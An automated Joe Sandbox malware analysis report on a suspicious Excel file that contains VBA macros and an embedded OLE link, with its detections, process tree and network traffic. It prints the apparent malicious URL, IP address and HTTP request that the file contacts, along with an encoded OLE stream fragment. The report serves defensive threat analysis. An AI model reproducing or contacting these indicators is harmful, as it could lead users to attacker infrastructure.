Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MS100384UTC.xls

Overview

General Information

Sample name:MS100384UTC.xls
Analysis ID:1578870
MD5:59b463677f083cb8bf771e27162ef915
SHA1:d97b1cdbb09e2b4b93f8de903460fade41382ff0
SHA256:c306daeb532d48d6f51f35c1612d9bed38e854aa80eb86f14513c06a6bee67d7
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Excel sheet contains many unusual embedded objects
Machine Learning detection for dropped file
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 3636 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 4928 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 1080 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\MS100384UTC.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DesusertionIp: 14.103.79.10, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3636, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49730
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DesusertionIp: 192.168.2.9, DesusertionIsIpv6: false, DesusertionPort: 49730, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3636, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: MS100384UTC.xlsReversingLabs: Detection: 18%
Source: MS100384UTC.xlsVirustotal: Detection: 13%Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\~DFA2BD46232F560DC8.TMPJoe Sandbox ML: detected
Machine Learning detection for sample
Source: MS100384UTC.xlsJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.9:49730 version: TLS 1.2
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49730
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49730
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49730
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49730
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49730
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49730
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49730
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49730
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49730
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49731
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49731
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49731
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49731
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49731
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49731
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49731
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.9:49731
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: excel.exeMemory has grown: Private usage: 2MB later: 91MB
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literature HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literature HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 15:11:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 4645Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15724800; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-Powered-By: Next.jsETag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"Vary: Accept-Encoding
Source: MS100384UTC.xls, ~DFA2BD46232F560DC8.TMP.9.drString found in binary or memory: https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literatureP
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.9:49730 version: TLS 1.2

System Summary

barindex
Excel sheet contains many unusual embedded objects
Source: MS100384UTC.xlsOLE: Microsoft Excel 2007+
Source: MS100384UTC.xlsOLE: Microsoft Excel 2007+
Source: MS100384UTC.xlsOLE: Microsoft Excel 2007+
Source: MS100384UTC.xlsOLE: Microsoft Excel 2007+
Source: MS100384UTC.xlsOLE: Microsoft Excel 2007+
Source: ~DFA2BD46232F560DC8.TMP.9.drOLE: Microsoft Excel 2007+
Source: ~DFA2BD46232F560DC8.TMP.9.drOLE: Microsoft Excel 2007+
Source: ~DFA2BD46232F560DC8.TMP.9.drOLE: Microsoft Excel 2007+
Source: ~DFA2BD46232F560DC8.TMP.9.drOLE: Microsoft Excel 2007+
Source: ~DFA2BD46232F560DC8.TMP.9.drOLE: Microsoft Excel 2007+
Source: MS100384UTC.xlsOLE indicator, VBA macros: true
Source: ~DFA2BD46232F560DC8.TMP.9.drOLE indicator, VBA macros: true
Source: MS100384UTC.xlsStream path 'MBD006207A8/\x1Ole' : https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literaturePS#c-":PH9MR379k6Oo~gj,/[v[D"vZc45~@<JMC1wQ>9uWmM2b4hxZWRSirFstcXuaZU5hVMV7khJOFHI4iqQUc3HPqz5dXGoP8tjwf9mEYyTvr3TSvTGH4fw0ZtryIvsdWjfP8NhBGzifiCIGCfVoymK6bRjW1FfJilyriMTUPbyX8lwwogJZdV5HMi3VFi9IJmoFF0rmFfDumWJuvmsEZcA30YVKkHtRoYHB1sEToIeLdoiPQXH4hN$FI5gV,Z
Source: ~DFA2BD46232F560DC8.TMP.9.drStream path 'MBD006207A8/\x1Ole' : https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literaturePS#c-":PH9MR379k6Oo~gj,/[v[D"vZc45~@<JMC1wQ>9uWmM2b4hxZWRSirFstcXuaZU5hVMV7khJOFHI4iqQUc3HPqz5dXGoP8tjwf9mEYyTvr3TSvTGH4fw0ZtryIvsdWjfP8NhBGzifiCIGCfVoymK6bRjW1FfJilyriMTUPbyX8lwwogJZdV5HMi3VFi9IJmoFF0rmFfDumWJuvmsEZcA30YVKkHtRoYHB1sEToIeLdoiPQXH4hN$FI5gV,Z
Source: classification engineClassification label: mal60.winXLS@4/21@1/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F2A1D34B.emfJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{66B8BE34-B759-4933-B44E-F660C86A305B} - OProcSessId.datJump to behavior
Source: MS100384UTC.xlsOLE indicator, Workbook stream: true
Source: ~DFA2BD46232F560DC8.TMP.9.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: MS100384UTC.xlsReversingLabs: Detection: 18%
Source: MS100384UTC.xlsVirustotal: Detection: 13%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\MS100384UTC.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: MS100384UTC.xlsStatic file information: File size 1123840 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: MS100384UTC.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: MS100384UTC.xlsStream path 'MBD006207A6/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: MS100384UTC.xlsStream path 'Workbook' entropy: 7.99859087916 (max. 8.0)
Source: ~DFA2BD46232F560DC8.TMP.9.drStream path 'MBD006207A6/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: ~DFA2BD46232F560DC8.TMP.9.drStream path 'Workbook' entropy: 7.99859087916 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 861Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts3
Exploitation for Client Execution		1
Scripting		1
Process Injection		2
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection		LSA Secrets1
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
MS100384UTC.xls18%ReversingLabs
MS100384UTC.xls13%VirustotalBrowse
MS100384UTC.xls100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFA2BD46232F560DC8.TMP100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s.deemos.com
14.103.79.10
truefalse
    		high
    s-part-0035.t-0009.t-msedge.net
    		13.107.246.63
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literaturefalse
        		unknown
        https://s.deemos.com/404false
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literaturePMS100384UTC.xls, ~DFA2BD46232F560DC8.TMP.9.drfalse
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            14.103.79.10
            		s.deemos.comChina
            		18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse

            General Information

            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1578870
            Start date and time:2024-12-20 16:09:41 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 4s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Run name:Without Instrumentation
            Number of analysed new started processes analysed:11
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:MS100384UTC.xls
            Detection:MAL
            Classification:mal60.winXLS@4/21@1/1
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .xls
            • Changed system and user locale, location and keyboard layout to French - France
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Active ActiveX Object
            • Active ActiveX Object
            • Active ActiveX Object
            • Active ActiveX Object
            • Scroll down
            • Close Viewer

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.109.28.47, 23.218.208.109, 52.113.194.132, 51.116.253.170, 52.149.20.212, 20.190.147.10, 13.107.246.63
